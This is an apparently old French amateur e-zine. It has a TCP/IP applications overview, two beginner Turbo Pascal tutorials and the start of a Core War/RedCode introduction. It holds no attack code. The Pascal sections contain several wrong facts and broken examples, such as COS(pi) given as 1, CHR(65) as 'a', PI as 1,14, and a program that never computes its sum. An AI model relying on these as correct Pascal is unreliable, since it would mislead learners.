Ce probleme est de nos jours pali, nottament par l'integration d'application OSI dans les reseaux TCP/IP, comme X 500...

3 facteurs expliquent la montee en puissance du TCP/IP en 35 ans...:

L'interoperabilite --> En utilisant le TCP/IP et les services TCP/IP, l'interoperabilite est devenu possible entre les differents matos des different constructeurs...

Interet commercial --> Evident...de plus le grand public s'interesse d eplsu en plus au web...

L'augmentation du nombre d'outils de gestion reseaux --> exemple du SNMP (Simple Network Management Protocol)


VuE d'EnSEMble DES aPPliCaTIONS TCp/iP

 ___________		 ___________						 ___________
|		|		|		|						|		|
|  serveur	|		|  serveur	|						|  USER E	|
|    WEB	|		|    DNS	|						|		|
|		|		|		|						|client NFS	|
|___________|		|___________|						|___________|
 	|				|								|	
	|				|								|
	|____________     	|___								|	
 ___________	 |		____|__________________________                 |            ___________
|		|	 |	     |					 |			|		|  		|
| HOTE IBM  |	 |_________|					 |    		|		| HOTE VMS  |
|		|________________|	TCP/IP			 |       		|		|     	|
|___________|		     |		INTERNET	  	 |________________|__    	|___________|
				     |					 |         |	   |_____________|______________
				     |					 |         |
                             |					 |         |
                _____________|					 |         | 				
               |             |					 |	     |			  
               |             |_______________________________|         |                           
  		   |					    |			         __|________	
	 	 __|__	                      |                     |  serveur  |
		|agent|		         _______|_______		  |     de	  |_____[ USER C]	
		|SNMP	|	              | 			|		  | terminaux |     [  SMTP ]
		|_____|			  | 			|		  |___________|	
[user A]	   |				  | 			|									           	
 [telnet sur]  |				  | 			|
 [hote VMS]    |				  |_______________|	
 ___|__________|					|  |    |	
	     |             __________		|  |    |
	     | 		|	     |______|  |    |____________[user B, FTP sur l'hote IBM]
	     |		| Serveur  |	   |     
	[user D]		|   NFS    |	[user F]	
	[gestion SNMP]	|__________|	[http sur le server WEB]	
				

(ouf!!)



Voici un joli schma vous montrant les plus importantes applications TCP/IP.
(Ce schema est cens representer un gros reseau en action, du genre Internet)
Voici une rapide description des applications ici prsentees:

TELNET --> Permet a un utilisateur de se connecter a distance a un hote par l'intermediaire des protocoles TCP/IP.
L'user travaille sur l'hote comme si il etait directement devant, en effet les sequences de touches frappees sur sa propre becanne sont envoyees a l'hote, et celui renvoie les reponses au pc du user.
Telnet utilise le TCP/IP comme protocole de communication.

FTP --> Permet le transfert de fichier entre deux machines sur un reseau TCP/IP, quelquesoit la taille des files.
L'utilisateurs se connecte a un serveur FTP grace a son client FTP et peut voyager dans les repertoires de l'hote et lancer des commandes de transfert.

SMTP --> Permet a un utilisateur d'envoyer un message a un autre, les deux etant connectes a un reseau TCP/IP.
C'est le protocole TCP/IP qui est utilis par un utilisateur pour transmettre son mail a un serveur de messagerie, celui ci s'occupera de le transmettre au destinataire grace a l'adresse electronique de celui ci.

DNS --> Constitue un annuaire electronique permettant de nommer les differentes ressources du reseau. DNS associe un nom symbolique a une adresse IP. (utile quand on surf, et dans les mails)
DNS utilise le protocole UDP/IP comme protocoles de communication.

HTTP --> Permet l'envoi de pages web a un pc equip d'un navigateur (LynX, Netscape...). Ce navigateur peut lire des fichiers audio, video, textes...
HTTP utilise le TCP/IP comme protocoles de communication.

SNMP --> Permet la gestion a distance de speripheriques comme des hub, des routeurs, des passerelles...
SNMP utilise les protocoles UDP/IP comme protocoles de communication...


VOILA !!!
Vous avez un avant-gout des differentes applications TCP/IP, je les detaillerai d'avantage dans le prochain article qui traitera du developpement d'Internet et comparaison des modeles TCP/IP tres utiliss aujourd'hui que sont les modeles OSi et DoD (les couches...)

--== Ad-Tonnou pour vous servir ==-- 


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			Tutorial Turbo Pascal							  	Ad-Tonnou 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

**************************************
** TUTORIAL TURBO PASCAL (Ad-Tonnou)**
**************************************


Salut, c'est ad-tonnou, me revoilou pour un article qui, cette fois, traitera d'un language de programmation qui me tiend  coeur, j'ai nomm le turbo-pascal...
Cet article est le premier d'une longue serie qui traiteront tous de ce sujet, la difficult allant bien sur en augmentant...
Personnelement, j'utilise TP 6.0 pour compiler et editer tous mes progs, je ne vais pas en expliquer l'utilisation car elle est assez intuitive...

Vu qu'il faut commencer par le debut, on va tout d'abbord commencer par la base: la structure d'un programme...puis on verra un exemple de prog et enfin les differentes types de declarations....

I)LA STRUCTURE D'UN PROG
""""""""""""""""""""""""


TurboPascal comme bien des languages (tous ?) est un language trs structur, la systmatique en question fut developpe durant les annes 60 par Dijkstra.

	a)STRUCTURE GENERALE
	
Un programme en TurboPascal se compose de 4 parties bien delimitables:
   --> L'en-tte (indispensable)
   --> L'instruction Uses (pas oblig)
   --> La Partie Dclarative (pas oblig)
   --> Le corps principal du prog (indispensable)

L'en tte:
Contient seulement le mot rserv 'program' et du nom du prog

L'instruction Uses:
Cette partie contient les noms des units que le prog utilisera et que le compilateur integrera...(en gros les units sont les "bibliothques" dans lesquelle le compilateur ira chercher les signification des mots rservs...heu je sais c'est po tres clair)

La partie declarative:
Cette partie contient la declaration des identificateurs utiliss lors de la suite du prog, par exemple les constantes, les variables...elles doivent imperativement y tre prsente pour la bonne demarche du prog par la suite.
                      
Le corp principal du prog:
Celui debute par le mot reserv 'Begin' et se termine par le mot 'end.' ( !!!---> le point est partie integrante du mot)
En quelques sortes c'est ici que vous direz au prog ce qu'il doit faire...

	b)REMARQUES
	
Commentaires:
On peut mettre dans le code source des commentaires, c'est  dire des remarques que le compilateurs ne prendra pas en compte lors de la transcription du code.
Ils sont tres utiles et ils ne faut pas les ngliger...notamment utiles lors de la diffusion de votre source pour une meilleure comprhension du prog par d'autres personnes.
Ils figurent entre accolades...
exemple:
{ceci est un commentaire}
                      
Conseils:
L'utilisation de majuscules dans le code permet galement une meilleure comprhension..
exemple
'unmotlong' ecrit comme ceci est moins lisible que comme cela 'UnMotLong'

Divers:
Les instructions se terminent toujours par un ';' !!!!

	c)EXEMPLE
	
Structure gnral d'un prog en TurboPascal
(les mots cls sont en majuscules pour plus de lisibilit..

PROGRAM nom du prog 			     {en tte}
USES unit1,unit2....unitn        	{Uses   }
{--------------------------------------------}
{----dbut le la partie dclarative----------}
CONST
	{les constantes}
TYPE
	{type de donnes}
VAR
	{variables puis procdures et fonctions (sous-programmes) }
{-----fin de la partie dclarative---------}
{------------------------------------------}
BEGIN {dbut du corp principal}
	{differentes instructions dites 'corporelles'}
END. {fin du corp principal}


	d)MOTS CLEFS
	
Ces mots cls ont une signification particuliere,'write'(permet l'affichage) en est un...
Ils appartiennent au vocabulaire de TurboPascal

Les utilisateurs (nous) peuvent crer leurs propres identificateurs (qui peuvent tre des variables, des constantes, des procdures...)
Les identificateurs peuvent tre aussi longs que vous le voulez, se composer des characteres suivants:les lettres et les chiffres... (chiffres interdits en dbut d'identificateur, les '.' et ',' sont interdites tout comme les charactres spciaux...)
CF: IV)


II) L'UNITE CRT
"""""""""""""""


TRES TRES IMPORTANTE est cette unit.
En effet elle permet de grer les routines suivantes:
Clrscr (efface l'cran), GotoXY (place le curseur aux coordonnes XY), ReadKey (permet de lire un charactere), KeyPressed (attente de l'appui d'un touche) et de plus l'unit CRT permet de gerer la solicitation du clavier....
L'intruction USES s'ecrit alors de la sorte
USES crt;
Le compilateur integrera donc la bibliotheque 'crt'.

III) EXEMPLE SIMPLE
"""""""""""""""""""


Enonc du problme: 'lire' deux chiffres A et B, les additionner et crire la somme A+B  l'cran...
On peut d'ores et dja diviser cette tache en plusieurs parties correspondant  des instructions simples:
	Effacer l'cran
	Lire A puis B
	Effectuer la SOMME A+B
	Afficher SOMME
	QUITTER

Ceci pourrait se traduire par le code suivant...

ETAPE 1:
ClrScr; {efface l'cran}
Readln(A); {lit A  partir du clavier puis va a la ligne,'READ' fait la mme chose sans le retour  la ligne} 
ReanLn(B);
SOMME := A + B; {on affecte la valeur 'A + B' a l'identificateur 'SOMME' avec le signe :=}
WriteLn(SOMME); {affiche la valeur contenue dans l'identificateur 'SOMME' c'est  dire
READLN; {j'y reviendrai}	

ETAPE 2:
Il nous faut rajouter les instruction 'Begin' et 'End.'	en dbut et en fin de corp...le corp du prog est le code de l'etape1

ETAPE 3:
Nous employons ici 3 variables (A,B et SOMME, ce sont des variables car elles dependent de l'utilisateur), il nous faut donc les dclarer dans la section dclarative...(!!! ---> IMPERATIF)
VAR
	A,B,SOMME : INTEGER; {j'y reviendrai}

Les variables de mmes types sont spares par une virgule, et le type des variables se distingue par 
un ':'
cas gnral:
Var1,Var2 : Type1;
Var3,Var4 : Type2; 

ETAPE 4:
Il faut maintenant rajouter l'en-tte: le mot 'program' et le nom du prog) et l' instruction Uses
Ici on utilisera la bibliotheque 'crt' car on utilise la routine 'clrscr'


ETAPE 5:
Nous obtenons finalement ce code:
----------------------------------------
{debut du prog}
Program Addition; {En-tte}
USES Crt;          {uses}
Var                {partie dclarative}
	A,B,SOMME : Integer;
Begin               {corp principal du prog}
	Clrscr;
	Readln(A);
	Readln(B);
	SOMME:= A + B;
	Writeln(SOMME);
	Readln;	
End.
{fin du prog}
-----------------------------------------
ReadLn -->  L'instruction Readln sert  faire attendre le programme l'appui de la touche 'ENTREE'
		Ne l'ommetez pas car sinon l'affichage de la somme se fera si rapidement que vous n'aurez rien le temps de                  		voir.
Grace a readln le prog affiche la somme puis attend la touche entre avant de quitter et de revenir a l'editeur.

L'instruction Write (ou writeln) permet de melanger l'affichage de charactres  l'affichage de variables...et ceci par write('charactere',VAR,'characteres',VAR)
Exemple ---> WriteLn('la somme de ',A,'et de ',B,'est egale  ',SOMME)
en admettant que A=2 et B=4 l'affichage donnera : la somme de 2 et de 4 est de 6.

Ainsi si on essaye de donner un peu plus d'allure a notre programme on pourrait faire ceci...
---------------------------------------------------------------
Program Addition;
Uses CRT;
Var
	A,B,SOMME : integer;
Begin
	Writeln('Bienvenue dans mon super prog....)
	Writeln('veuillez entrer le chiffre A plizzzz...')
	read(A);
	Writeln('Veuillez entrer le chiffre B plizzzz...');
	read(B);
	Writeln('La somme de ',A,'et de ',B,' est gale ',SOMME);
	Writeln('veuillez appuyer sur entre pour quitter');
	readln;
End.
---------------------------------------------------------------
Ce prog est fourni avec le zip...
Maintenant on va passer  un point trs important....

IV)DECLARATION DE CONSTANTES ET DE VARIABLES
""""""""""""""""""""""""""""""""""""""""""""
Maintenant que l'on a vu la structure gnrale d'un prog en turopascal, on peut passer  la suite...
On va voir plus precisement la partie dclarative d'un prog, et ce qu'elle paut contenir...

TurboPascal possede un mot rserv par type de dclaration: variables,constantes....
La partie dclarative est importante: RIEN NE PEUT ETRE UTILISE DANS UN PROG EN TP SANS QU IL N AIT ETE DECLARE AUPARAVANT...
Cette partie debute par la fin de l'instruction USES et se termine la ou commence le corp du prog (begin)
Deux types de dclarations sont indispensables pour la suite: les variables et les constantes...
	
	a)les constantes
	
Les constantes sont des "donnes" qui ne varieront en aucun cas lors de l'execution du programme...
La partie dclarative de constantes dbute par le mot cl 'CONST'
Suit l'identificateur (le nom de votre choix qui sera affect de la valeur de votre choix)
puis la valeur affcte  cet identificateur:
CONST
	Identificateur1 = Valeur1;
	Identificateur2 = Valeur2;
Par la suite du prog, l'identificateur1 aura donc pour valeur la valeur1.
le code 'write(identificateur1)' donnera donc a l'affichange la valeur 1.
Les valeurs peuvent tre des valeurs numriques ou bien des charactres et mme des chaines de characteres.
EXEMPLE
aX     = 'allianX' {chaine de ch}
PI     = 1,14      {valeur numrique}

On apelle 'contenue' la valeure d'une constante...ainsi le contenu de 'aX' est la chaine de chaactere 'allianX'
Choisissez des noms simples et courts pour vos identificateurs, cela simplifie grandement les choz.

Exemple ---> un prog qui se sert du taux de la tva:
Je vais po le faire mais il est bien facile de piger pourquoi il est utile de declarer ce taux en tant que constante des le debut du prog.
Ainsi, vous n'aurez pas a tout modifier en cas de changement de ce taux, mais simplement le debut, la partie declarative de constantes, c'est a dire qu'une seule ligne.

	b)Les variables
	
Les variables sont des identificateurs auxquels on peut affecter des chiffres, des lettres, des chaines de characteres...
Une variable se definit par 3 elements : Son nom - Son type de donne - Son contenu
Dans la partie dclarative, une variable recoit son nom, et son type de donne...
Son contenu ne sera qu'affecte au cours de l'execution du prog..(dfini par l'utilisateur)

La partie dclarative d'une variable dbute par le mot reserv 'VAR'..puis le(s) nom(s) de(s) variable(s),
on spare les noms de variable de mmes types par une virgule....et on met un ':' entre les(s) nom(s) et le type de donne.
Exemple:
-----------------------------
VAR
	var1,var2 : type1;
	var2      : type2;
------------------------------
Ici var1 et var2 ne sont pas encore attibues d'un contenu...on leur donne juste leur type de donne.(CF Article2)
Attention a ne pas oublier le ';' car l'attribution d'un type  une variable est un instruction.

Voici la maniere d'affecter une valeur  un contenu:
------------------------------
NomVar:=valeur
------------------------------
le symbole ':=' est le symbole d'affectation d'une valeur  une variable


Exemple:
------------------------------
a     := 9;
b     :='allianX';
------------------------------
Vous ne pouvez faire cela sans avoir auparavant declarer les variables a et b dans la partie dclarative de variables.


Voila, le premier article est fini.
Forcement c'est lourd mais il faut savoir tout a pour pouvoir faire des trucs plus sympas...
J'en ai mis deux autres dans le zine pour trois raisons:
	Vous avez dj un bon paquet d'informations  assililer, si vous pigez pas, relisez plusieurs fois; c'est important.
	Pour plus de clart j'ai divis mon petit premier tutorial en trois articles...
	J'en ai ral le cul d'crire des conneries...je continuerai demain...

--== Ad-Tonnou pour vous servir ==--



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			Tutorial Turbo Pascal 2							  	Ad-Tonnou 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

***************************************
** TUTORIAL TURBO PASCAL (Ad-Tonnou) **
***************************************

Nous voila reparti pour un deuxieme article de folie...
Celui-ci sera consacr aux diffrents types de donnes en turbo pascal et quelques fonctions de bases appliquables sur 
ceux-ci puis des petits trucs simples divers...
Pour lire cet article vous devez avoir pig le premier



""""""""""""""""""""""""""""""""
" LES TYPES DE DONNEES SIMPLES "
""""""""""""""""""""""""""""""""

En Turbo Pascal, on compte 5 types de donnes simples:
	Les nombres entiers 		(INTEGER)
	Les nombres dcimaux 		(REAL)
	Les charactres 			(CHAR)
	Les chanes de charactres 	(STRING)
	Les valeurs logiques 		(BOOLEAN)

Les variables, lors de leur dclaration, doivent se voir attribuer d'un des 5 types prcedents.

Sur chacun des ces types, on peut effectuer des oprations de comparaison (trs utiles):
	> 	(superieur )
	< 	(inferieur )
	>=	(superieur ou gal)		
	<=	(inferieur ou egal)
	=	(gal )
	<>	(diffrent)

		I)Les Nombres Entiers (INTEGER)
		"""""""""""""""""""""""""""""""
	a)les bases
	
Domaine de validit des INTEGER:
-32768..........32767

Oprations possibles:
	Les comparaisons
	L'addtion 		+
	La soustraction 	-
	Multiplication    *
	La division 	DIV (rsultat entier, pas de dcimales)
	Le modulo		MOD (Le reste de la division)
Exemples:
10+8=18
20-3=17
5*9=45
45 DIV 5=9
45 MOD 5=0
45 DIV 6=7
45 MOD 6=3 (on divise 45 par 6, on a (6*7)+3=45)

Turbo Pascal offre la possibilit d'effectuer quelques procdures standarts sur les differents types de donnes...pas d'inquietude, vous allez comprendre:

	b)Fonctions standarts sur des variables du type INTEGER
	
Soit A une variable de type REAl
Soit B une variable de type INTEGER

ABS(B) donne la valeur absolue de la variable B
Le rsultat est du type INTEGER
Appel: 	Result:=ABS(B);
Exemple: 	Result:=ABS(-5);
La variable 'Result' est alors affect de la valeur 5.

ROUND(A) donne la valeur arrondie entire de la variable A
Le rsultat est de type INTEGER
Appel: 	Result:=ROUND(A);
Exemple:	Result:=ABS(5.8);
La variable 'Result' est affect de la valeur 6

SQR(B) donne le quarr de la variable B
Le rsultat est de type INTEGER
Appel:	Result:=SQR(B);
Exemple:	Result:=SQR(3);
La variable 'Result' est affect de la valeur 9

TRUNC(A) donne la partie entire de la variable A...attention elle n'est pas arrondie!
Le resultat est du type INTEGER	
Appel:	Result:=TRUNC(A);
Exemple:	Result:=TRUNC(5.8);
La variable 'Result' est affect de la valeur 5

		II)LES NOMBRES REELS (REAL)
		"""""""""""""""""""""""""""

	a)les bases
	
Domaine de validit:
2.9*10^-39..............1.7*10^38

Dclaration:
---------------------
VAR
	exemple : real
---------------------

Oprations possibles:
	Les mmes que pour les INTEGER
	La division est possible avec les REAL, /   (le rsultat est du type REAL)

	b)Fonctions standarts sur des variables du type REAL
	
Soit A une variable de type real
Soit Result une variable du type du rsultat

ABS(A) donne la valeur absolue de la variable A
Le rsultat est du type REAL
Appel: Result:=ABS(A);
Exemple: Result:=ABS(-5.8);
Alors la variable Result est affecte de la valeur 5.8

COS(A) donne le cosinus de la variable A...attention le rsultat est exprim en Radian
Le rsultat est du type REAL
Appel: Result:=COS(A);
Exemple: Result:=COS(pi);
La variable Result est affecte de la valeur 1.00
SIN(A) donne de la mme facon le sinus de la variable A

FRAC(A) donne la valeur dcimale de la variable A
Le rsultat est du type REAL
Appel: Result:=FRAC(A)
Exemple: Result:=FRAC(5.123456)
La variable Result sera alors affecte de la valeur 0.123456

INT(A) quand  elle donne la partie entire de la variable A...c'est pareil que FRAC
Exemple: Result:=INT(5.123456)
la varible Result sera alors affecte de la valeur 5.

SQR(A) donne le carr de A
Le resultat est du mme type que la varible A
Exemple: Result:=SQR(2)
La variable Result sera alorsd affecte de la valeur 4

SQRT(A) donne la racine carr de A
Exemple: Result:=SQRT(4)
La variable Result sera alors affecte de la valeur 2

	c)Sortie formate
	
Examinons ce code...
------------------------------
Program test1;
Uses
	CRT;
VAR
	A:REAL;
Begin
	Writeln('donnez moi la valeur de A');
	Readln(A);
	Writeln('affichage normal.....',A);
	Writeln('Affichage format',A:5:2);
End.
-------------------------------
Admettons que la variable A soit affecte de la valeur 5.123456
Alors l'affichage normale donnera  l'cran: '5.1234560000e+00'...ce qui n'est pas trs beau...
Maintenant, l'affichage format donera: '5.12'...
A:5:2 signifie que la varible A sera affich avec 2 chiffres apres la virgule (!!---> c'est atomatiquement arrondi) et que la variable A sera affiche sur un total de 5 chiffres.

	d)Petite appliquation
	
------------------------------------------------------
program division;
uses crt;
var
   result : real;
   rest : real;
   A,B : integer;
begin
     ClrScr;
     writeln('Bienvenue dans mon deuxieme super progz pour allianX');
     writeln('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~');
     WriteLn('Veuillez me donner le chiffre dont vous voulez voir la division Euclydienne!!!');
     readln(A);
     WriteLn('Par combien je le divise ??? ');
     ReadLn(B);
     Result := A DIV B;
     Rest := A MOD B;
     Writeln('Veuillez appuyer sur Entre afin de continuer');
     ReadLn;
     Write('Le resultat de la division de ',A,' par ',B,' donne:');
     write(Result:4:0);
     write(' et le reste est de ');
     writeln(rest:4:0); {cf article 2, "affichage format"}
     write('Appuyez sur Entree pour quitter...');
     ReadLn;
End.
---------------------------------------------------------

J'espre que vous comprenez car l je passe  la suite...surtout que c'est vraiment bidon.

		III)Les charactres (CHAR)
		""""""""""""""""""""""""""
Ce type de donnes s'applique  tous les charactres du code ASCII (American Standart Code for Information Interchange).
Ce code comprend tous les charactres de votre clavier plus tous les charactres graphique...
Tous ces charactres sont reprsents par un chiffre...compris entre 0 et 255 inclus.

	a)Les bases
	
On peut affecter un charactre  une constante:
--------------------------
CONST
	A = 'a'; {la variable A est affecte du charactre 'a'}
----------------------------

Dclaration du type char
------------------
VAR
	ch:char; {alors la variable de nom 'ch' sera affect du type 'char'}
------------------
Ce code est contenu dans la partie dclarative du progz...il permettra donc par exemple d'affecter par la suite une valeur  la variable ch...cette valeur tant bien entendu de type 'char'
--------------------
ch:='y'; {alors la variable 'ch' est affecte de la valeur 'y'}
ch:='chaine'; {cela ne marchera pas car 'chaine n'est pas un charactre mais une chaine de charactres}
--------------------

Les oprations possible sont les oprations de comparaison...on les a dj vues au-dessus...

	b)Les fonctions standarts possibles sur les variables de type 'CHAR'
	
Soit 'ch' une variable du type char...
I est une variable de type INTEGER....
La variable 'result' est du type du resultat

CHR(I) retourne le charactere dont le code ascii/ibm est de I
Appel: RESULT:=CHR(I);
Exemple: RESULT:=CHR(65);
La variable 'RESULT' est alors affcte de la valeur 'a'

ORD(CH) retourne le code du charactere 'CH'
Appel: RESULT:=ORD(CH);
Exemple: RESULT:=ORD('A');
La variable 'RESULT' sera alors affect de la valeur 65

PRED(CH) donne le predecesseur de la variable CH
Appel: RESULT:=PRED(CH);
Exemple: RESULT:=PRED('b');
La variable result sera alors affecte de la valeur 'a'

SUCC(CH) c'est comme PRED5CH sauf qu'il donne le successeur

		IV)Les chaines de characteres (STRING)
		""""""""""""""""""""""""""""""""""""""
	a)les bases
	
C'est le regroupement de charactres de longueur maximale de 255 charactres...
Le type s'apelle STRING

Dclaration de variables de type STRING (dans la partie dclarative bien sur)
------------------------------
var
	st:string;
------------------------------

On peut limiter la longueur maximale d'une chaine...en indiquant une valeur entiere a la suite du mot rserv STRING
------------------------------
var
	st:string[10];
------------------------------

Dclarations de constantes en tant que textes:
------------------------------
Const
	ax:='allianX';
	ad:='ad-toto';
------------------------------
(notez les '', et le signe d'affectation ':=')

On peut aussi acceder  un seul charactere dans une string...
------------------------------
ax:='allianX';
write(ax[7]);
------------------------------
L'affichage donnera alors  l'cran 'X'. (le 7me charactere de la string 'allainX'.)

Les oprations possibles sur des string sont les comparaisons et les concatnations...
Exemple de prog mettant bout  bout (c'est a la concatenation) deux strings
------------------------------
Program concatene;
var
	st1,st2:string;
	st3:string;
begin
	clrscr;
	st1:='team';
	st2:='allianX';
	writeln('voici la 1ere chaine',st1);
	writeln('voici la 2eme chaine',st2);
	st3:=st2 + st1;
	writeln('voici leur concatenation',st3);
	readln;
end.
------------------------------

	b)fonctions standarts sur les strings
	
CONCAT(ST,ST1) met bout a bout plusieurs chaines (ici st et st1)
appel: concat(st,st1...);
exemple: st:='turbo';
	   st1:='pascal';
	   result:=concat(st,st1);
La variable 'result' sera alors affecte de la valeur (de type string) 'turbo pascal'

COPY(ST,I,J) copie une partie de longueur J de la chaine ST a partir de la position I
appel: concat(st,i,j);
exemple: st:=ad-tonnou;
	   result:=copy(st,4,6);
Le resultat sera alors affecte de la valeur 'tonnou'

DELETE(ST,I,J) efface J characteres a partir de I dans la chaine ST.
appel: delete(st,i,j);
exemple: st:='ad-tonnou';
	   delete(st,4,6);
         write(st)
L'affichage donnera alors 'ad-' (puisque 'tonnou' s'est fait delet)

INSERT(st,st1,I) insere la chaine st dans la chaine st1 a partir de la position I
Appel: INSERT(st,st1,I);
exemple: insert('-t','adonnou',2);
write(st1); retournera alors la chaine 'ad-tonnou'

LENGTH(ST) retourne la longueur de la variable ST.
exemple: result:=length('ad-tonnou');
La variable 'RESULT' sera alors affecte de la valeur 9. (result doit etre declare en tant que integer)

Voila en gros les bases sur les strings....voyons maintenant le type 'boolean'.

		V)Les valeurs logiques (boolean)
		""""""""""""""""""""""""""""""""
	a)les bases
	
Une variable de type Boolean ne peut recevoir que 2 valeurs: true (vrai) ou false (faux)
Une opration du type a>b retourne le resultat
true si  a>b
false si a=<b
(NB --> > est l'operateur et A et B sont les operandes)

Syntaxe de dclaration d'une variable de type BOOLEAN
---------------------------
var
	test:boolean;
---------------------------

Les operations possibles sur les BOOLEANS:
--> les operations de comparaison (seulement quand false<true)
--> A and B (et logique)
--> A or B  (ou logique)
--> A XOR B (ou exclusif)
--> NOT A   (nona, negation de A)

Une seule fonction standart:
ODD(I) retourne true quand I est impair (I est ici integer)
exemple: result:=ODD(16)...
La variable 'result' est alors affectee de la valeur 'false' car 16 est paire.

VOILA !! Vous savez les bases (de bonnes bases)  propos des differents types de donnees de TurboPascal.
Je vais eclaircir quelques points qui je pense sont importants....

		VI)Les instructions d'entree READ/READLN
		""""""""""""""""""""""""""""""""""""""""
Ces commandes permettent de transmettre des valeurs a un programme par l'intermediaire du clavier.
-----------------------
READLN(X)
-----------------------
Cette commande attend de l'utilisateurs l'entree d'une valeur au clavier (depend du type de X).
Si X est du type 'CHAR' et que vous entrez la valeur '5', cela vous conduira systematiquement a une erreur (il faudra penser par exemple a integrer des routines interceptant les messages d'erreurs...ce sera pour plus tard)

Dans les exemples precedants, j'avais mis readln a la fin du code afin d'arreter le prog jusqu'a l'appui sur 'entree'.

Exemple tout con general
----------------------
write('quel est ton nom ???');
readln(nom);
----------------------
L'utilisateur comprendra qu'il doit indiquer son nom...
(L'instruction read est utile pour lire des trucs a partir d'autres files mais la on parle de solicitation des users, donc on reste a readln....)

Exemple encore tout con de l'utilisation simple de 'WRITE' et de 'READLN'...
------------------------------------------------------
program con;
uses crt;
var
	prenom:string[15];                 {le prenom, pas plus que 15 characteres}
	age:integer;                       {l'age}
	chiffre1,chiffre2,chiffre3:integer;

begin
	write('c koa ton nom ??');
	readln(Prenom);
	write(prenom,'c koa ton age ???');
	readln(age);
	write('indic moi 2 chiffres ! ');
	readln(chiffre1);readln(chiffre2);
	chiffre3:=chiffre1+chiffre2;
	writeln(prenom,'tu as ',age,' ans et la somme entre',chiffre1,' et ',chiffre2,' est ',chiffre3);
	write('appuis sur entree pour sortir');
	readln;
end.
------------------------------------------

		VII)La commande 'READKEY'
		"""""""""""""""""""""""""
Certains progs necessitent l'appui d'une touche sur le clavier mais sans pour autant que celle ci s'affiche (sans echo)	
L'appel est de cette forme:
-------------------------------
ch:=readkey;
-------------------------------
(la variable ch doit etre declaree auparavant en tant que charactere)
La touche pressee est enregistree en tant que valeur de 'CH' mais n'est pas affichee pour autant.
exemple con:
----------------------------------
progam readkey
uses crt;
var
	ch:char;
begin
	clrscr
	writeln('appuyez sur une touche');
	ch:=readkey; {ch est alors affectee de la valeur 'lettre lu' mais rien ne s'affiche}
	writeln('touche lue:'ch);
	readln;
end.



VOILA !!!!
C'est fini, le prochain episode traitera des boucles et de la programmation en TP oriente decisions...

--== Ad-Tonnou pour vous servir ==--

		

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			Le Core War							  Tun!Z2000	
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
               
		   CCCCCCC  OOOOOOO  RRRRRR   EEEEEEE
               C        O     O  R     R  E
               C        O     O  R     R  E
               C        O     O  RRRRRR   EEEEE
               C        O     O  R   R    E
               C        O     O  R    R   E
               CCCCCCC  OOOOOOO  R     R  EEEEEEE


                  W   W      W   W  A  RRRRRR
                   W   W    W   W  AA  R     R
                    W   W  W   W  A A  R     R
                     W   WW   W  A  A  RRRRRR
                      W  WW  W  AAAAA  R   R
                       WW  WW  A    A  R    R
                        W  W  A     A  R     R



______________________________
[Auteur: Tun!Z 2000          |
[Contact: Tuniz2000@yahoo.com|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



	Introduction : Au dbut de l're des microordinateurs, un etudiant riquain trouva intelligent de faire un programme qui se duplique dans la mmoire du systme sur lequel il tourne, sans rien faire d'autre, ce n'tait pas un virus. Et puis un autre tudiant est venu avec un autre programme qui lui ne servait qu'a dtruire le processus du premier programme. A la fin, le deuxieme avait gagn. Ces deux tudiants auraient invent le CoreWar. Auraient, parceque cette histoire n'est pas officielle, une lgende quoi, comme l'histoire de la pomme de Newton qui aurait t invente par Newton pour expliciter sa thorie. Bon le but du CoreWar est de crer un soldat qui serait plus fort que celui de l'adversaire. C'est des soldats-robots qui remplsissent la memoire systeme, pas des soldats avec graphisme 3D polygonal au moteur Voxel etc, etc... Les premiers CoreWarriors crivaient leur soldats en assembleur donc il s'agit en fait d'execution d'instruction. Seuleument, utiliser la vraie mmoire systme entrainait des problemes sur l'odrinateur Hte. Alors des types ont eu l'ide de synthtiser une arne virtuelle reprsente par une grille qui reprsente une mulation d'un microprocesseur et de sa mmoire, et on cr un nouveau langage, moins complet mais plus simple que l'assembleur, le RedCode.



	Le RedCode
Malgr quelques ajouts de certains programmeurs, le RedCode officiel est constitu des fonctions suivantes :
* DAT argument
Il s'agit d'une instruction non executable. Si un soldat tente de l'executer, il a perdu. Si une case memoire comporte l'instruction DAT argument, alors toute rference  cette case est rfre  l'argument, qui peut etre une variable par exemple.
* MOV argument1 argument2
Cette instruction recopie le contenu de la case memoire argument1 ou le nombre argument1 sur la case memoire argument2.
* JMP argument
Cela permet de sauter directement  la case memoire argument.
* JMZ argument1 argument2
Si on a argument2 ou le contenu de la case argument2 nul, alors on saute  la case argument1.
* JMG argument1 argument2
Si on a argument2 ou le contenu de la case argument2 positif, alors on saute  la case argument1.
* ADD argument1 argument2
Ajoute la valeur de argument1 ou de la case argument1  la valeur de argument2 ou de la case argument2.
* SUB argument1 argument2
L'inverse: on soustrait la valeur de argument1 ou de la case argument1  la valeur de argument2 ou de la case argument2.
* DJZ argument1 argument2
Enlve 1  la valeur de argument2 ou de la case argument2, et saute  la case argument1 si le nouvel argument2 est nul.
* CMP argument1 argument2
Compare les valeurs des deux arguments ou de leurs cases memoire respectives, et saute l'instruction qui suit s'ils sont differents.


Certains programmeurs ajoutent  cela des fonctions comme Fork ou Kill, pour se dupliquer ou tuer un processus, mais ces commandes ne sont pas officielles.

L'argument se compose d'un indice d'adressage et d'un nombre:
#X signifie la valeur X, et pas la case memoire (adressage immediat)
